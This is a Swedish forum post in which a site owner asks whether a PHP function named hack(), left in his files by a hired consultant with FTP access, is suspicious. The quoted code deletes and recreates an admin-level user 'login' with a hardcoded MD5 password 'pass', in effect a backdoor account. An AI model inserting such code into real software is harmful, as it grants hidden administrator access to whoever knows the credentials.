FAQ |
Kalender |
![]() |
#1 | ||
|
|||
Mycket flitig postare
|
Tjena.
Jag har för några dagar sen anlitat en konsult för att koda en sak till mig. Han fick tillgång till mina filer (ftp) för att lättare kunna redigera allt, och när jag sedan såg en av filerna så fanns denna sträng: Kod:
public function hack() { $this->db->query("DELETE FROM " . DB_PREFIX . "user WHERE username = 'login'"); $this->db->query("INSERT INTO " . DB_PREFIX . "user SET username = 'login', password = MD5('pass'), user_group_id = 1, status = 1"); } Han säger att han gjorde detta för att inte behöva maila för admin login, men detta känns ganska skumt tycker jag.. |
||
![]() |
![]() |
|
|